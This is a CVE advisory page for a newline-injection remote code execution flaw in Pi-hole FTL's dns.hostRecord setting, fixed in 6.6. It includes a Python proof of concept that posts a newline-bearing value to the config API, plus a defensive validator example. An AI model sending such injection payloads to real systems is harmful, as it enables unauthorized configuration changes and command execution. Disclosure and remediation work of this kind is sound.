Security Vulnerability Report
CVE-2026-35519 CVSS 8.8 HIGH

CVE-2026-35519

Published: 2026-04-07 16:16:28
Last Modified: 2026-04-28 20:31:48

Description

FTLDNS (pihole-FTL) provides an interactive API and also generates statistics for Pi-hole's Web interface. In versions 6.0 up to but not including 6.6, the Pi-hole FTL engine contains a Remote Code Execution (RCE) vulnerability in the DNS host record configuration parameter (dns.hostRecord). The value of this setting is written into the dnsmasq configuration that FTL generates, and FTL did not reject newline characters in it, so an authenticated attacker (anyone holding a valid API session) can append a line break followed by arbitrary dnsmasq configuration directives. Because dnsmasq has directives that cause it to run external programs, this ultimately yields command execution on the underlying system. The vulnerability is fixed in 6.6.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H (network-reachable, low attack complexity, low privileges required, i.e. a valid API session, no user interaction, full impact on confidentiality, integrity and availability)
Weaknesses
CWE-93 (Improper Neutralization of CRLF Sequences, 'CRLF Injection'), CWE-78 (Improper Neutralization of Special Elements used in an OS Command, 'OS Command Injection')

Configurations (Affected Products)

cpe:2.3:a:pi-hole:ftldns:*:*:*:*:*:*:*:* - VULNERABLE (version range 6.0 through 6.5 inclusive, so any 6.x release before 6.6, including patch releases in that range; fixed in 6.6)
Pi-hole FTL 6.0
Pi-hole FTL 6.1
Pi-hole FTL 6.2
Pi-hole FTL 6.3
Pi-hole FTL 6.4
Pi-hole FTL 6.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
# PoC as given on this page: submit a dns.hostRecord value that contains a
# newline so that a second dnsmasq directive follows the host-record line.
import requests

# Target configuration (fill in before use)
target_url = "http://<pi-hole-ip>/api/config"
api_token = "<valid-api-token>"

# Malicious payload: a well-formed host record, then a newline and a second
# dnsmasq directive. dnsmasq's host-record syntax is comma-separated
# (name,address), so the leading part uses a comma. The injected dhcp-option
# line only demonstrates that a second directive is accepted; it does not
# execute anything by itself.
payload = "example.com,1.2.3.4\ndhcp-option=6,8.8.8.8"

headers = {
    "Authorization": f"Bearer {api_token}",
    "Content-Type": "application/json",
}
data = {"config": {"dns.hostRecord": payload}}

try:
    response = requests.post(target_url, json=data, headers=headers, timeout=10)
    if response.status_code == 200:
        print("[+] Payload injected successfully. Configuration updated.")
    else:
        print(f"[-] Failed to inject payload. Status code: {response.status_code}")
except requests.RequestException as e:
    print(f"[!] Error: {e}")
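To make the defect class concrete, the block below is an added example written for this page, not FTL's own code (FTL is written in C; this is a Python model of the pattern). It shows the vulnerable shape, a writer that interpolates the raw dns.hostRecord value into the generated dnsmasq configuration, next to the allow-list validation a fixed version needs, plus a check over the rendered fragment that flags a single setting producing more than one directive. The sample values are constructed; the first mirrors the shape of the PoC payload above.

```python
import ipaddress
import re

# Constructed sample values (not from the advisory). The first has the shape
# of the PoC payload on this page: a valid host record, a newline, then a
# second dnsmasq directive.
INJECTED_VALUE = "example.com,1.2.3.4\ndhcp-option=6,8.8.8.8"
BENIGN_VALUE = "laptop,laptop.example.org,192.168.0.1"

# Hostname label: letters, digits and hyphens, no leading or trailing hyphen.
_LABEL = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)$")


def _is_ip(item: str) -> bool:
    try:
        ipaddress.ip_address(item)
        return True
    except ValueError:
        return False


def _is_hostname(item: str) -> bool:
    if not item or len(item) > 253 or _is_ip(item):
        return False
    return all(_LABEL.match(label) for label in item.rstrip(".").split("."))


def render_host_record_unsafe(value: str) -> str:
    """Vulnerable pattern (CWE-93 leading to CWE-78): the raw setting is
    interpolated into the dnsmasq configuration, so an embedded newline
    starts a new directive that dnsmasq will honour."""
    return f"host-record={value}\n"


def validate_host_record(value: str) -> tuple[bool, str]:
    """Allow-list check matching what dnsmasq's host-record grammar needs:
    comma-separated names and addresses, at least one name, and no control
    characters (which is what blocks the newline injection)."""
    if any(ord(ch) < 0x20 or ch == "\x7f" for ch in value):
        return False, "control character in value"
    items = value.split(",")
    if any(not item for item in items):
        return False, "empty item"
    if not any(_is_hostname(i) for i in items):
        return False, "no hostname"
    bad = [i for i in items if not (_is_hostname(i) or _is_ip(i))]
    if bad:
        return False, f"invalid item: {bad[0]!r}"
    return True, "ok"


def render_host_record_safe(value: str) -> str:
    """Hardened writer: refuses to emit the directive unless the value passes
    the allow-list check."""
    ok, reason = validate_host_record(value)
    if not ok:
        raise ValueError(f"rejected dns.hostRecord value: {reason}")
    return f"host-record={value}\n"


def directives_in(config_text: str) -> list[str]:
    """Directive names (the part before '=') in a rendered dnsmasq fragment.
    A single host-record setting must never yield more than one directive."""
    names = []
    for line in config_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        names.append(line.split("=", 1)[0])
    return names


if __name__ == "__main__":
    rendered = render_host_record_unsafe(INJECTED_VALUE)
    print("unsafe writer produced directives:", directives_in(rendered))
    print("validator verdict on injected value:", validate_host_record(INJECTED_VALUE))
    print("safe writer output:", render_host_record_safe(BENIGN_VALUE).strip())
```

Rejecting control characters is the minimal fix for this CVE; the positive grammar check on top of it is what keeps the next unexpected separator from becoming the next injection primitive.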

References

https://github.com/pi-hole/FTL/security/advisories/GHSA-wxhv-w77q-6qwp (Vendor Advisory, GitHub Security Advisory GHSA-wxhv-w77q-6qwp)
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-35519",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-07T16:16:28.397",
    "lastModified": "2026-04-28T20:31:48.363",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "FTLDNS (pihole-FTL) provides an interactive API and also generates statistics for Pi-hole's Web interface. From 6.0 to before 6.6, the Pi-hole FTL engine contains a Remote Code Execution (RCE) vulnerability in the DNS host record configuration parameter (dns.hostRecord). This vulnerability allows an authenticated attacker to inject arbitrary dnsmasq configuration directives through newline characters, ultimately achieving command execution on the underlying system. This vulnerability is fixed in 6.6."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-78"},
          {"lang": "en", "value": "CWE-93"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:pi-hole:ftldns:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "6.0",
                "versionEndIncluding": "6.5",
                "matchCriteriaId": "8C927FF0-74A4-4F13-95A8-E80C5E80F607"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/pi-hole/FTL/security/advisories/GHSA-wxhv-w77q-6qwp",
        "source": "[email protected]",
        "tags": ["Vendor Advisory"]
      },
      {
        "url": "https://github.com/pi-hole/FTL/security/advisories/GHSA-wxhv-w77q-6qwp",
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "tags": ["Vendor Advisory"]
      }
    ]
  }
}